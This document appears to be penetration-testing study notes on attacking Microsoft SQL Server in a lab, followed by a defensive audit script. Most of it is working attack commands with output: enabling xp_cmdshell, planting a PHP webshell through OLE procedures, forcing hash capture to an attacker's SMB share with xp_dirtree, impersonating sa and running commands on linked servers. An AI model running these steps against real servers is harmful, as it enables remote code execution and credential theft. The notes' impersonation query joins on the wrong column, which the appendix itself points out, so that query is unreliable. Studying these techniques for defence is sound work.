MSSQL

TCP port 1433

Footprinting using nmap script

> sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248

Footprinting using msf

msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts 10.129.201.248

Connecting to MSSQL w/ python3

> python3 mssqlclient.py Administrator@10.129.201.248 -windows-auth

Interacting w/ MSSQL - SQSH (Linux)

sqsh -S 10.129.20.13 -U username -P Password123

If we want to use Windows Authentication (if enabled) instead of SQL Server Authentication, pass the username as SERVERNAME\\accountname or .\\accountname:

sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h

Interacting w/ MSSQL - SQLCMD (Windows)

C:\htb> sqlcmd -S 10.129.20.13 -U username -P Password123

For sqlcmd, we need to type GO after our query to send the batch to the server for execution.

Command Execution through Extended Stored Procedures

1> xp_cmdshell 'whoami'
2> GO

output
-----------------------------
nt service\mssql$sqlexpress
NULL
(2 rows affected)

If xp_cmdshell is not enabled, we can enable it as follows:

-- To allow advanced options to be changed.
EXECUTE sp_configure 'show advanced options', 1
GO

-- To update the currently configured value for advanced options.
RECONFIGURE
GO

-- To enable the feature.
EXECUTE sp_configure 'xp_cmdshell', 1
GO

-- To update the currently configured value for this feature.
RECONFIGURE
GO

Local File Read/Write

Writing Local File

Enable Ole Automation Procedures (requires admin privileges)

1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO

Then execute the OLE stored procedures to write a file:

1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO

Reading Local Files

1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
2> GO

BulkColumn

-----------------------------------------------------------------------------
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to hostnames. Each
# entry should be kept on an individual line. The IP address should

(1 rows affected)

Capture MSSQL Service Hash

  1. on our attacking machine, start Responder or impacket-smbserver

sudo responder -I tun0

or

sudo impacket-smbserver share ./ -smb2support

  2. in the MSSQL shell, make the server connect to our share with xp_dirtree

1> EXEC master..xp_dirtree '\\10.10.15.142\share\'
2> GO

subdirectory    depth
--------------- -----------

alternatively, with xp_subdirs

1> EXEC master..xp_subdirs '\\10.10.110.17\share\'
2> GO

HResult 0x55F6, Level 16, State 1
xp_subdirs could not access '\\10.10.110.17\share\*.*': FindFirstFile() returned error 5, 'Access is denied.'

Impersonate Existing Users with MSSQL

  1. identify users we can impersonate
1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO

name
-----------------------------------------------
sa
ben
valentin

(3 rows affected)

  2. check whether we are currently sysadmin

1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> go

-----------
julio                                                                                                                    

(1 rows affected)

-----------
          0

(1 rows affected)

IS_SRVROLEMEMBER returned 0, so we are not sysadmin.

  3. impersonate sa
1> EXECUTE AS LOGIN = 'sa'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO

-----------
sa

(1 rows affected)

-----------
          1

(1 rows affected)

Communicate with Other Databases with MSSQL

lateral movement to other databases

  1. identify linked servers
1> SELECT srvname, isremote FROM sysservers
2> GO

srvname                             isremote
----------------------------------- --------
DESKTOP-MFERMN4\SQLEXPRESS          1
10.0.0.12\SQLEXPRESS                0

(2 rows affected)

  2. execute commands on the linked server
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
2> GO

------------------------------ ------------------------------ ------------------------------ -----------
DESKTOP-0L9D4KA\SQLEXPRESS     Microsoft SQL Server 2019 (RTM sa_remote                                1

(1 rows affected)

MSSQL databases

Default System Database   Description
------------------------  ----------------------------------------------------------------------------
master                    Tracks all system information for an SQL Server instance
model                     Template database that acts as a structure for every new database created. Any setting changed in the model database will be reflected in any new database created afterwards
msdb                      The SQL Server Agent uses this database to schedule jobs & alerts
tempdb                    Stores temporary objects
resource                  Read-only database containing system objects included with SQL Server

Dangerous Settings

  • MSSQL clients not using encryption to connect to the MSSQL server
  • The use of self-signed certificates when encryption is being used. It is possible to spoof self-signed certificates
  • The use of named pipes
  • Weak & default sa credentials. Admins may forget to disable this account
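As an added defender-side example (not part of the original notes), the T-SQL audit below checks the surface the sections above abuse: the xp_cmdshell and Ole Automation Procedures settings, who holds IMPERSONATE on which login, the login mappings of linked servers, and the state of the sa login. It only reads catalog views; it assumes a login with VIEW ANY DEFINITION (or sysadmin) and is run through sqlcmd with GO separators as shown above.

```sql
-- Added audit batch (example code, not from the original notes).
-- 1. Features abused for command execution and file write.
--    Both xp_cmdshell and Ole Automation Procedures should read 0 / 0.
SELECT name,
       CAST(value        AS INT) AS configured,
       CAST(value_in_use AS INT) AS running
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'show advanced options');
GO

-- 2. Who can impersonate whom. For IMPERSONATE, major_id is the login that may
--    be impersonated and grantee_principal_id is the login allowed to do it
--    (the query in the notes above joins on the grantor instead).
SELECT grantee.name AS grantee_login,
       target.name  AS can_impersonate,
       p.state_desc
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals target  ON target.principal_id  = p.major_id
WHERE p.permission_name = 'IMPERSONATE'
  AND p.state IN ('G', 'W');          -- GRANT / GRANT WITH GRANT OPTION
GO

-- 3. Linked servers and the remote login each local login maps to. A mapping to
--    a remote sysadmin (like sa_remote in the output above) is a lateral-movement
--    path; local_principal_id 0 means the mapping applies to all local logins.
SELECT s.name                          AS linked_server,
       s.is_linked,
       s.is_remote_login_enabled,
       ISNULL(lp.name, '<all logins>') AS local_login,
       ll.uses_self_credential,
       ll.remote_name
FROM sys.servers s
LEFT JOIN sys.linked_logins    ll ON ll.server_id    = s.server_id
LEFT JOIN sys.server_principals lp ON lp.principal_id = ll.local_principal_id
WHERE s.server_id <> 0;              -- server_id 0 is the local instance
GO

-- 4. The sa login (fixed SID 0x01): enabled, or with a stale password, is the
--    weak default called out under Dangerous Settings.
SELECT name,
       is_disabled,
       LOGINPROPERTY(name, 'PasswordLastSetTime') AS pw_last_set
FROM sys.server_principals
WHERE sid = 0x01;
GO
```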